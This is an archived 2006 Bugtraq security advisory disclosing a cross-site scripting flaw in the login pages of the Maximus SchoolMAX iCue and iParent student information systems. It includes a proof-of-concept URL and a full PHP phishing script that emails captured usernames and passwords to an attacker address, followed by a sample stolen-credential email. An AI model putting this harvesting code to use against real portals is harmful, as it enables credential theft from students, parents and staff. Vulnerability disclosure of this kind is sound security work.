lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4495153E.1020800@gci.net>
Date: Sun, 18 Jun 2006 00:56:30 -0800
From: Fixer <fixer@....net>
To: bugtraq@...urityfocus.com
Subject: XSS Vulnerability in Maximus SchoolMAX


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 The InfoGuard Group Vulnerability Summary 2006-04

Application:  Maximus' iCue and iParent (http://www.schoolmax.net)
Versions:     All
Bugs:          Cross-Site Scripting (XSS)
Date:          18 June 2006
Author:       Charles H.
E-mail:       charles@...oguardgroup.com
Website:    http://www.infoguardgroup.com



1) Introduction


SchoolMAX from MAXIMUS is one of the most technologically advanced
student information systems available today. It is district-based yet
still provides for school-based management capabilities and controls.

http://www.maximus.com/corporate/pages/SchoolMAX.asp


2)Login XSS

The login.asp file assocaited with SchoolMAX's iCue and iParent applications
suffers from a Cross-Site Scripting flaw.  This can result in cookie and/or
credentials theft, especially if used in conjunction with a social
engineering attack.  A simple attack against iCue might look like this::

https://icue.victimsite.us/toas/icue_login.asp?error_msg=These%20aren't%20the%20droids%20you're%20looking%20for

This will result in the message "These aren't the droids you're looking
for" being displayed.

This shows the basic idea of the XSS.  You can perform various
obfuscation techniques to hide the message.

Additionally, when used in conjunction with social engineering,user
credentials can be easily obtained.:

If we take a php file like this:

<?php


$my_email = "h@x0r@...l.net";

$header =
"https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_login=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR=";

if ($_SERVER['REQUEST_METHOD'] != "POST"){exit;}


$disallowed_name = array(':',';',"'",'"','=','(',')','{','}','@');

foreach($disallowed_name as $value)
{

if(stristr($_POST[Name],$value)){header("location:
$_SERVER[HTTP_REFERER]");exit;}

}

$disallowed_email = array(':',';',"'",'"','=','(',')','{','}');

foreach($disallowed_email as $value)
{

if(stristr($_POST[Email],$value)){header("location:
$_SERVER[HTTP_REFERER]");exit;}

}

$message = "";



while(list($key,$value) =
each($_POST)){if(!(empty($value))){$set=1;}$message = $message . "$key:
$value\n\n";} if($set!==1){header("location: $_SERVER[HTTP_REFERER]");exit;}

$message = $message . "-- \nThank you for exploiting iParent";
$message = stripslashes($message);

$subject = "FormToEmail Comments";
$headers = "From: " . $_POST['Email'] . "\n" . "Return-Path: " .
$_POST['Email'] . "\n" . "Reply-To: " . $_POST['Email'] . "\n";

mail($my_email,$subject,$message,$headers);
header( "Location:
https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_login=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR="
);

?>

Post it to some place, then send a forged e-mail which redirects to
this, we can capture the credentials.  When we do,
here's what the attacker gets in the e-mail:

Subject: FormToEmail Comments
Date: Mon, 06 Mar 2006 21:48:05 -0900 (AKST)
From: Nobody <nobody@...timsite.us>
To: Badguy@...l.net


DST_NBR: 1111

USER_NME: 4564654

OPER_PASS: 123456

login: Log in



4)Patch Status

Maximus has been contacted multiple times since this issue was
discovered in March.  To date, they have not responded.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQEVAwUBRJUVPgt0Y4479LtgAQK5yQf/QYCmo/Tel9z9Aank1y3tJUSv/rmAnLNB
UxNOGXIflr7cofVncuoXqLq2oI9KGn04QeYafj13+c+42t5KJRHG/Vw8Y0XrWq9b
hMf+BXkIXq7QCjuyP6HUSpt7j6PmI1FYiidxcL5Y3NmNuChRI4m1akeWIjt55TMp
OxflWcP3kgnUNT6CSbXKwOzXw9dL+TBlNQfhbQ5fDNIhrghkC4Ar/ivDnHo1qrkS
Ie6xi7ahT56418W3LaToPnJA1S5ggIvDSpmxKRDO2yU8r0d+bntcSMYQESSwUbAe
sVUNKcWP8RKXmQy7Mf+2BDZJNesCvKZ/Hu9OSOH96ikHL9OIC/iIxQ==
=ZBTh
-----END PGP SIGNATURE-----


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ